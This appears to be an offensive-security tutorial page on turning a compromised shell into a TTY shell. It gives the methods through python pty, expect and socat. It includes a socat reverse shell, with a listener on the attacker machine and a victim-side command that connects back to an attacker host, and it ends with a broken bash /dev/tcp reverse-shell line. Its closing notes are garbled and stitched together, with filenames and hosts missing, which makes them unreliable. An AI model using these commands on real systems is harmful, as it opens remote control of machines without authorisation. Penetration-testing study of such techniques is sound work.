Spawning a tty shell,spawn%20a%20tty%20shell.%20...%203%20Using%20socat

1. Using python

This method is the most popular method spawning a tty shell. This requires the target server to have python (or python3) installed. Keep in mind to spawn /bin/bash instead of /bin/sh.

python -c "import pty;pty.spawn('/bin/bash')"

2. Using expect

Not all server have expect installed by default, however if you're lucky enough, you can use this command to spawn a tty shell.

$ expect -v
  expect version 5.45.4
$ cat > /tmp/ <<EOF
spawn bash

$ chmod u+x /tmp/
$ /tmp/

3. Using socat

Socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections.

Again, not every server has socat installed (not installed by default). You could try to compile the binary itself or download a socat static binary.

Anyway in this example, we are going to use socat to spawn another reverse shell with tty support. If you looking for bind shell instead, see in this post.

On the attacker machine, set up socat listener: replace 4444 with your listning port.

socat -,raw,echo=0 tcp-listen:4444

On the victim machine, connect back the attacker machine and spawn a shell. Replace <host> with attacker IP and <port> with attacker listing port.

$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<host>:<port>

Check the if the shell is tty.

To check if the shell is a tty shell, simply enter tty command like below.

$ tty

Taking it further!

Once you manage to upgrade to tty shell, you still have a limited shell (not fully interactive). You won't be able to use tab-completion and arrow keys. This is really frustrating and it can be more risky if an execution gets stuck, you can't use ctrl+c or ctrl+z without killing your session. Follow my next tutorial here on how you can upgrade the shell to fully interactive shell.

bash -i works but tab autocomplete is not working:

ctr + z to back ground it.

running the sudo -l got me to the personal zip folder.

Unzip it by typing "unzip"

went to the directory and check the

stty raw -echo

Maybe if we replace it with a different bash script, we can get a reverse shell?

bash -i >& /dev/tcp/ 0>&1 $ 

Last updated